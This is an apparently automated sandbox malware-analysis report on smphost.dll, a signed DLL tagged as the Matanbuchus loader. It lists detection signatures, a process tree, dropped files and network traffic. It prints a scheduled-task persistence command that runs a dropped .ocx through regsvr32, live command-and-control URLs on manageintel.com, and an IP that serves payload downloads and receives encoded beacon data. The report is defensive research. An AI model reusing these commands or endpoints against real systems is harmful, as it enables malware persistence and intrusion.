Edit tour

Windows Analysis Report
smphost.dll

Overview

General Information

Sample Name:	smphost.dll
Analysis ID:	562835
MD5:	fc484855692f2a7d1eae090086a1eb72
SHA1:	2e9103747750b40835f58d9e57c2ab75eeaf25f6
SHA256:	e58b9bbb7bcdf3e901453b7b9c9e514fed1e53565e3280353dccc77cde26a98e
Tags:	dllmatanbuchusSATURNCONSULTANCYLTDsigned
Infos:

Detection

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Uses known network protocols on non-standard ports

Sigma detected: Regsvr32 Network Activity

Sigma detected: Suspicious Call by Ordinal

Uses schtasks.exe or at.exe to add and modify task schedules

Uses 32bit PE files

Drops PE files to the application program directory (C:\ProgramData)

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to check if a connection to the internet is available

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Registers a DLL

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6120 cmdline: loaddll32.exe "C:\Users\user\Desktop\smphost.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 4764 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6212 cmdline: rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 3576 cmdline: regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

schtasks.exe (PID: 4532 cmdline: C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx MD5: 15FF7D8324231381BAD48A052F85DF04)

WerFault.exe (PID: 6348 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 2064 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 6256 cmdline: rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6760 cmdline: rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5388 cmdline: rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 5808 cmdline: C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 6460 cmdline: -e C:\ProgramData\6\5507.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)

regsvr32.exe (PID: 1264 cmdline: C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 2016 cmdline: -e C:\ProgramData\6\5507.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)

cleanup

Sigma Overview

System Summary

Sigma detected: Regsvr32 Network Activity

Source: DNS query

Author: Dmitriy Lifanov, oscd.community: Data: Image: C:\Windows\SysWOW64\regsvr32.exe, QueryName: manageintel.com

Sigma detected: Suspicious Call by Ordinal

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4764, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1, ProcessId: 6212

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx, CommandLine: C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 3576, ProcessCommandLine: C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx, ProcessId: 4532

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: smphost.dll

Virustotal: Detection: 8%

Perma Link

Antivirus detection for URL or domain

Source: http://manageintel.com/WUzZRUBQje/Auth.php

Avira URL Cloud: Label: malware

Source: smphost.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE

Source: unknown	HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49841 version: TLS 1.2

Source: smphost.dll

Static PE information: certificate valid

Source:

Binary string: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\Release\BhJM.pdb source: regsvr32.exe, 00000002.00000002.437623410.000000007FC00000.00000040.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.437475087.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E9EED8A FindFirstFileExW,		2_2_6E9EED8A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 38_2_6F84ED8A FindFirstFileExW,		38_2_6F84ED8A

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 185.14.31.158 32710			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: manageintel.com

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49855

Source: Joe Sandbox View

ASN Name: ITLDC-NLUA ITLDC-NLUA

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_6E9E8210 InternetCheckConnectionA,InternetOpenUrlA,InternetReadFile,WriteFile,InternetCloseHandle,

2_2_6E9E8210

Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /WUzZRUBQje/vAtVEC.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache

Source: global traffic

TCP traffic: 192.168.2.3:49762 -> 185.14.31.158:32710

Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443

Source: regsvr32.exe, 00000002.00000002.437475087.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/
Source: regsvr32.exe	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml
Source: regsvr32.exe	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml

Source: unknown

HTTP traffic detected: POST /WUzZRUBQje/Auth.php HTTP/1.1User-Agent: Windows-AzureAD-Authentication-Provider/11.0Host: manageintel.comContent-Length: 549Content-Type: application/x-www-form-urlencodedAccept-Language: en-USData Raw: 61 75 74 68 3d 65 79 49 7a 51 30 56 72 49 6a 6f 69 56 33 4a 47 65 44 6c 68 55 45 73 31 64 30 35 6a 54 31 56 57 52 6b 78 47 55 32 74 6d 51 6c 6c 4c 4d 30 78 6a 59 56 4e 6c 5a 31 4e 45 53 6b 70 50 56 7a 52 35 56 31 45 33 4d 30 77 79 52 6e 64 71 4b 32 34 77 50 53 49 73 49 6a 4e 6d 5a 54 45 78 49 6a 6f 69 53 79 73 30 4f 47 39 52 50 54 30 69 4c 43 49 7a 62 54 64 34 49 6a 6f 69 56 58 4a 30 62 79 74 68 52 54 30 69 4c 43 49 31 5a 47 56 69 4f 57 4d 69 4f 69 4a 4c 64 57 74 33 63 57 5a 75 59 69 49 73 49 6b 52 54 4d 6e 67 69 4f 69 4a 4b 5a 58 4e 73 4d 48 46 68 56 79 49 73 49 6b 56 4d 61 69 49 36 49 6c 56 78 62 47 63 77 63 58 46 50 4d 30 56 7a 55 53 49 73 49 6b 56 76 4e 69 49 36 49 6c 68 79 4e 58 67 34 59 55 55 39 49 69 77 69 52 6e 52 76 49 6a 6f 69 53 6e 63 39 50 53 49 73 49 6c 45 32 57 44 59 69 4f 69 4a 56 53 58 42 59 64 31 6c 48 63 44 52 33 50 54 30 69 4c 43 4a 55 51 55 31 6d 62 53 49 36 57 79 4a 58 53 58 52 36 4b 7a 55 72 61 7a 56 57 61 79 74 4c 64 7a 30 39 49 6c 30 73 49 6d 4e 43 52 69 49 36 49 6c 5a 77 64 32 38 78 64 6e 5a 51 4f 54 4a 6f 55 6c 46 6f 64 32 46 6c 65 6d 70 6b 5a 45 68 7a 50 53 49 73 49 6d 55 77 4d 32 56 6b 49 6a 6f 69 56 55 39 57 57 6e 67 32 59 55 30 77 56 56 56 4d 51 31 68 61 61 30 31 42 4b 32 35 6d 62 57 64 50 65 55 74 6e 4e 47 56 68 4f 56 68 55 54 6b 4a 4f 55 32 56 4d 56 45 4e 6d 57 54 30 69 4c 43 4a 6d 4d 57 52 68 49 6a 6f 69 56 44 52 4f 51 6a 46 61 65 58 41 30 56 31 56 7a 56 6e 67 77 52 32 5a 35 61 6b 68 43 5a 7a 51 39 49 69 77 69 64 31 41 32 49 6a 6f 69 57 6d 55 30 63 6d 38 72 53 46 49 69 4c 43 4a 33 5a 32 70 32 49 6a 6f 69 57 6b 78 6f 64 6a 56 6e 50 54 30 69 4c 43 4a 36 61 30 4d 33 49 6a 6f 69 49 6e 30 3d Data Ascii: auth=eyIzQ0VrIjoiV3JGeDlhUEs1d05jT1VWRkxGU2tmQllLM0xjYVNlZ1NESkpPVzR5V1E3M0wyRndqK24wPSIsIjNmZTExIjoiSys0OG9RPT0iLCIzbTd4IjoiVXJ0bythRT0iLCI1ZGViOWMiOiJLdWt3cWZuYiIsIkRTMngiOiJKZXNsMHFhVyIsIkVMaiI6IlVxbGcwcXFPM0VzUSIsIkVvNiI6IlhyNXg4YUU9IiwiRnRvIjoiSnc9PSIsIlE2WDYiOiJVSXBYd1lHcDR3PT0iLCJUQU1mbSI6WyJXSXR6KzUrazVWaytLdz09Il0sImNCRiI6IlZwd28xdnZQOTJoUlFod2FlempkZEhzPSIsImUwM2VkIjoiVU9WWng2YU0wVVVMQ1haa01BK25mbWdPeUtnNGVhOVhUTkJOU2VMVENmWT0iLCJmMWRhIjoiVDROQjFaeXA0V1VzVngwR2Z5akhCZzQ9Iiwid1A2IjoiWmU0cm8rSFIiLCJ3Z2p2IjoiWkxodjVnPT0iLCJ6a0M3IjoiIn0=

Source: unknown

DNS traffic detected: queries for: manageintel.com

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_6E9E8210 InternetCheckConnectionA,InternetOpenUrlA,InternetReadFile,WriteFile,InternetCloseHandle,

2_2_6E9E8210

Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /WUzZRUBQje/vAtVEC.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache

Source: unknown	HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49841 version: TLS 1.2

System Summary

Source: smphost.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE

Source: C:\Windows\SysWOW64\regsvr32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 2064

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E9F3EB6	2_2_6E9F3EB6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E9E8C90	2_2_6E9E8C90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 38_2_6F853EB6	38_2_6F853EB6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 38_2_6F848C90	38_2_6F848C90

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 6E9E9960 appears 34 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 6F849960 appears 34 times

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior

Source: smphost.dll

Virustotal: Detection: 8%

Source: smphost.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\smphost.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 2064
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBA1.tmp

Jump to behavior

Source: classification engine

Classification label: mal88.troj.evad.winDLL@22/7@16/2

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_6E9E8630 DllInstall,FormatMessageA,TextOutW,TextOutA,FormatMessageW,CoInitialize,OleInitialize,CoCreateInstance,CoGetCallerTID,FlattenPath,CreatePopupMenu,GetProductInfo,SetFileAttributesW,CharNextW,SHGetThreadRef,DceErrorInqTextA,GetConsoleCP,UuidCreate,GetMessageTime,GetVersion,GetPriorityClass,GetProcessId,IsTokenRestricted,RevertToSelf,RpcExceptionFilter,CveEventWrite,CoCancelCall,CoTaskMemAlloc,GetSidIdentifierAuthority,DisableThreadLibraryCalls,IsValidAcl,IsValidSid,CreateMutexExW,SHStrDupW,SHStrDupA,DuplicateIcon,

2_2_6E9E8630

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1

Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\computer
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3576

Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: smphost.dll

Static PE information: certificate valid

Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: smphost.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: smphost.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: smphost.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: smphost.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: smphost.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: smphost.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

File created: C:\ProgramData\6\5507.ocx

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe

File created: C:\ProgramData\6\5507.ocx

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\regsvr32.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49855

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
